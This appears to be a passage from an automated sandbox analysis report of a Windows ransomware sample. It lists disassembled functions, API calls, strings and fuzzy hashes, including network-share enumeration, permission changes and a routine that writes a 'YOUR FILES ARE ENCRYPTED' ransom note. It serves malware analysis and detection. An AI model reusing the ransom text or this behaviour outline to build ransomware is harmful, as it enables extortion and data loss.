                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: 7d96d5705ce5c3a48259e1251668687685074815502c1f5c6b6308b820dcfa00
                                  • Instruction ID: ee93925c4c345f66a9911afe1082feabdb101b993ddf931667077c98bc30ab79
                                  • Opcode Fuzzy Hash: 7d96d5705ce5c3a48259e1251668687685074815502c1f5c6b6308b820dcfa00
                                  • Instruction Fuzzy Hash: 65315A31608A049FEB65AA38D845B9AB3EBAF40311F51C46DF45DD7351EFB0AC808B24
                                  Function 0062D090 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 298COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,name:$,value:$..\..\openssl-1.1.0f\crypto\x509v3\v3_asid.c$0123456789$RDI$inherit$section:
                                  • API String ID: 0-3320458363
                                  • Opcode ID: c838381f5d95585b34d710dace4d1c8072a53ea72aee1782c090e1b6463f3aa3
                                  • Instruction ID: ccc6318b5c1cdc8bdb358fc5955de7a76c3075895255949eac45440720942b93
                                  • Opcode Fuzzy Hash: c838381f5d95585b34d710dace4d1c8072a53ea72aee1782c090e1b6463f3aa3
                                  • Instruction Fuzzy Hash: 87915F7078471277E7207B65EC0BF673A97AF42B04F05042AF984692D3E7A1ED11CA57
                                  Function 0067A6DC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: c1886c981f6de14ce00fff74a765288c1f57a62aaaf4244b803e8a45aa147ddf
                                  • Instruction ID: c962583473bf8e3b50398808a8991b80d5f41c6fd13527c59e6f9f3b730f8191
                                  • Opcode Fuzzy Hash: c1886c981f6de14ce00fff74a765288c1f57a62aaaf4244b803e8a45aa147ddf
                                  • Instruction Fuzzy Hash: 02C10374E04249AFCF11CFE8C841BEEBBB7AF89310F158199E558A7392C7349941CB66
                                  Function 005F0060 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 173encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 005F00B7
                                  • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000,?), ref: 005F00E8
                                  • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000,?), ref: 005F011B
                                  • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 005F01A6
                                  • CertFindCertificateInStore.CRYPT32(?,00000001,00000000,00070007,?,00000000), ref: 005F0258
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Cert$CertificateStore$CertificatesContextEnumProperty$Find
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$capi_cert_get_fname
                                  • API String ID: 3601032570-1657576467
                                  • Opcode ID: cde1a5329effff467c9580b26aac2412b5b3c612b9d372eed3429d73300c09ea
                                  • Instruction ID: e18480fce82a539ea6f21409246b5f5254083f977726184c4152b8ed44936fca
                                  • Opcode Fuzzy Hash: cde1a5329effff467c9580b26aac2412b5b3c612b9d372eed3429d73300c09ea
                                  • Instruction Fuzzy Hash: E3515831744306ABE720AF64CC86F3B7FDABBC5700F88041AFA48962C2EB65D904C761
                                  Function 005CA9DA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 173filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,-00000002,00000000,00000000,?,005CA9C8,00000000), ref: 005CAA0C
                                  • ReadFile.KERNEL32(00000000,?,00000003,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,-00000002,00000000,00000000), ref: 005CAA2E
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,-00000002,00000000,00000000,?,005CA9C8), ref: 005CAA64
                                  • ReadFile.KERNEL32(00000000,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CAA8C
                                  • CloseHandle.KERNEL32(00000000,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CAA8F
                                  • MultiByteToWideChar.KERNEL32(005CA9C8,00000000,?,000000FF,00000000,00000000,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CAAD7
                                  • MultiByteToWideChar.KERNEL32(005CA9C8,00000000,?,000000FF,?,00000000,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CAAEF
                                  • lstrlenA.KERNEL32(?,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CABAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: File$ByteCharMultiReadWide$CloseCreateHandlePointerlstrlen
                                  • String ID: ;
                                  • API String ID: 1836498745-1661535913
                                  • Opcode ID: 0edae139c7b29a45abe566b2f5f33e9106f5a605ae9b0f5a474836e72ac39e16
                                  • Instruction ID: 15a7951e56797fad034c7fc9aece8c776fac1689d52e937e362a5d485381714b
                                  • Opcode Fuzzy Hash: 0edae139c7b29a45abe566b2f5f33e9106f5a605ae9b0f5a474836e72ac39e16
                                  • Instruction Fuzzy Hash: 5251253094424DBEFB30D6F48C89FBEBF6ABB41308F14459DE551A60C2D6B05E45CB66
                                  Function 005E9858 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileType.KERNEL32 ref: 005E9859
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005E98B2
                                  • RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 005E99AE
                                  • ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 005E99DC
                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 005E99E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Event$FileSource$DeregisterRegisterReportTypeWrite
                                  • String ID: OpenSSL$OpenSSL: FATAL$no stack?
                                  • API String ID: 21571476-278800372
                                  • Opcode ID: 0a59dca03053063528a319e97687ea45b58c42e5e26a32a0fad525777eb2e8e6
                                  • Instruction ID: 064b8765549ee4affcc14bd0b0ae88142691e770d529de97f200364691cdfab5
                                  • Opcode Fuzzy Hash: 0a59dca03053063528a319e97687ea45b58c42e5e26a32a0fad525777eb2e8e6
                                  • Instruction Fuzzy Hash: B631C735640305BBEF249F60CC46FEA376EAF45300F10425AFA55EA191DB719A458B54
                                  Function 005F11F0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 99encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005F1AD0: CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 005F1B19
                                    • Part of subcall function 005F1AD0: GetLastError.KERNEL32 ref: 005F1B4F
                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 005F1256
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CertStore$CloseErrorLastOpen
                                  • String ID: Certificate %d$Listing certs for store %s$xXi
                                  • API String ID: 3847701492-2116776345
                                  • Opcode ID: 068ee36f1c84c00c09e48e76a9f6cb25619cf5dd824ac05aa2c17539a61a0830
                                  • Instruction ID: 4c04060a26e719c47a32dd7bc256356bd7dfa9e7d8bbfcc05e63bb6fd0722ac0
                                  • Opcode Fuzzy Hash: 068ee36f1c84c00c09e48e76a9f6cb25619cf5dd824ac05aa2c17539a61a0830
                                  • Instruction Fuzzy Hash: 3721F776602225BFC3202B66AC48F6BBFDDFB85771F000555FA0AD6142CE3AD80087A5
                                  Function 00674CA8 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00674CBC
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 00674CC8
                                  • _free.LIBCMT ref: 00674CD3
                                  • _free.LIBCMT ref: 00674CDE
                                  • _free.LIBCMT ref: 00674CE9
                                  • _free.LIBCMT ref: 00674CF4
                                  • _free.LIBCMT ref: 00674CFF
                                  • _free.LIBCMT ref: 00674D0A
                                  • _free.LIBCMT ref: 00674D15
                                  • _free.LIBCMT ref: 00674D23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 6f4d5c0c84a631fd0f0d13dbc23b33c74aec55d454b0b874cae508b181606d33
                                  • Instruction ID: 630ad50023c3f9a9b908ebffb01d24fbfd0feb16122af83cee4b6b74cdbf04a8
                                  • Opcode Fuzzy Hash: 6f4d5c0c84a631fd0f0d13dbc23b33c74aec55d454b0b874cae508b181606d33
                                  • Instruction Fuzzy Hash: 7611B975100508BFCB41EF94CC52EDD3BA6EF04351B4281A9BA1D8F222DA71DE909B84
                                  Function 005C658E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106stringshareCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WNetOpenEnumW.MPR(00000002,00000000,00000013,?,?), ref: 005C65BC
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrlenW.KERNEL32(992547), ref: 005C65FD
                                  • lstrcmpiW.KERNEL32(-00000004,992547), ref: 005C6612
                                  • lstrcpyW.KERNEL32(00000014,00000000), ref: 005C662F
                                  • WNetEnumResourceW.MPR(?,000000FF,00000000,00004000), ref: 005C66B1
                                  • WNetCloseEnum.MPR(?), ref: 005C66C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Enum$AllocateCloseHeapOpenResourcelstrcmpilstrcpylstrlen
                                  • String ID: 992547$:
                                  • API String ID: 578091008-2342601241
                                  • Opcode ID: e8626485140733305340549e90cbc834adb570a2f2739f087d646e732c3ee378
                                  • Instruction ID: ae84a7793ea2047cb35c44de1fa1975ac4955d173860ef5a6aa07f12fb1288be
                                  • Opcode Fuzzy Hash: e8626485140733305340549e90cbc834adb570a2f2739f087d646e732c3ee378
                                  • Instruction Fuzzy Hash: 2131C270600209AFEB21EFE4CC59FAD7FAABF45304F24452DE5419A191EB70DB85CB50
                                  Function 005E96F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 005E9717
                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 005E9727
                                  • GetProcessWindowStation.USER32(?,?,?,00000003), ref: 005E974B
                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 005E9766
                                  • GetLastError.KERNEL32(?,?,?,00000003), ref: 005E9774
                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?), ref: 005E97AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                  • String ID: Service-0x$_OPENSSL_isservice
                                  • API String ID: 1944374717-1672312481
                                  • Opcode ID: 913a5fb1ce0794239e6894fd90b0454a2e46d0910b017a47bf618138ec6b5ced
                                  • Instruction ID: 574033c1cc8a0f50b7cfc4d27f70754afbc75e5f41ae5e9e7a9f1964b2738196
                                  • Opcode Fuzzy Hash: 913a5fb1ce0794239e6894fd90b0454a2e46d0910b017a47bf618138ec6b5ced
                                  • Instruction Fuzzy Hash: D8310A31A10205ABCB24DFA9DC45BAE7BA9EF95320F10435AEC59D71D0EF3099058750
                                  Function 005E96D6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 97libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 005E9717
                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 005E9727
                                  • GetProcessWindowStation.USER32(?,?,?,00000003), ref: 005E974B
                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 005E9766
                                  • GetLastError.KERNEL32(?,?,?,00000003), ref: 005E9774
                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?), ref: 005E97AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                  • String ID: Service-0x$_OPENSSL_isservice
                                  • API String ID: 1944374717-1672312481
                                  • Opcode ID: e032e435a7e6425bc008612baf2a6aa63cfdf7e56c6f3a373e7bfa823d9bbdc2
                                  • Instruction ID: 02717719c93ea3b6cdda2b58dd05ae67887b2b79b5ecf5f8456f2ba396a8610e
                                  • Opcode Fuzzy Hash: e032e435a7e6425bc008612baf2a6aa63cfdf7e56c6f3a373e7bfa823d9bbdc2
                                  • Instruction Fuzzy Hash: C1212871A10305BBDB249FAADC4AFAE7BADEF56710F004229F959D71D0EF3099018750
                                  Function 005EF1B0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 96encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 005EF1E6
                                  • CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 005EF22A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CertCertificateContextProperty
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$capi_cert_get_fname
                                  • API String ID: 665277682-1657576467
                                  • Opcode ID: 2231efb16e0d37cac21298b085bac7fd34ca4f545af965674a5a39f8ac723c44
                                  • Instruction ID: e2aa1ca7fa3370c24ae5388ecbb0cb1580228509c1175c24c7d3de4cab6b13d1
                                  • Opcode Fuzzy Hash: 2231efb16e0d37cac21298b085bac7fd34ca4f545af965674a5a39f8ac723c44
                                  • Instruction Fuzzy Hash: BA21D7757407426BDA10FB68DC0BF6F7ADDBBD4B05F81042AF505DA282EB60C64447A2
                                  Function 005CA63C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 71stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenA.KERNEL32(README.TXT,00000000), ref: 005CA659
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000,00000000), ref: 005CA675
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,README.TXT,000000FF,?,0000000B), ref: 005CA68E
                                    • Part of subcall function 005C9FA1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000000,00000000,00000000,00000000,006D9A1C,00000000,?,005C8208,README.TXT), ref: 005C9FBF
                                    • Part of subcall function 005C9FA1: WriteFile.KERNEL32(00000000,YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke,?,?,00000000,?,005C8208,README.TXT), ref: 005C9FD8
                                    • Part of subcall function 005C9FA1: CloseHandle.KERNEL32(00000000,?,005C8208,README.TXT), ref: 005C9FDF
                                  • ShellExecuteW.SHELL32(00000000,ynw,00000005,00000000,00000000,00000005), ref: 005CA70B
                                  Strings
                                  • README.TXT, xrefs: 005CA653, 005CA658, 005CA68B
                                  • YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke, xrefs: 005CA6AE
                                  • xynw, xrefs: 005CA6EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: File$ByteCharCloseCreateExecuteFolderHandleMultiPathShellSpecialWideWritelstrlen
                                  • String ID: README.TXT$YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke$xynw
                                  • API String ID: 1498941749-273956997
                                  • Opcode ID: 738828d6740df9401153674e20c99e798f81b44ff840858d5b753ea8b0e6cd0c
                                  • Instruction ID: 3850ae81fb43420867bf03c7035b3b0575034d1f2dc13fd841651f20f05f9821
                                  • Opcode Fuzzy Hash: 738828d6740df9401153674e20c99e798f81b44ff840858d5b753ea8b0e6cd0c
                                  • Instruction Fuzzy Hash: CB21F87090828CFEEB1187A4DC88FEE7FBDAB11348F1442DAE445A7182E6755A49C731
                                  Function 005C7054 Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnterCriticalSection.KERNEL32(006D9828,00000000,?,?,?,005C1AE6), ref: 005C7071
                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,?,?,005C1AE6), ref: 005C7085
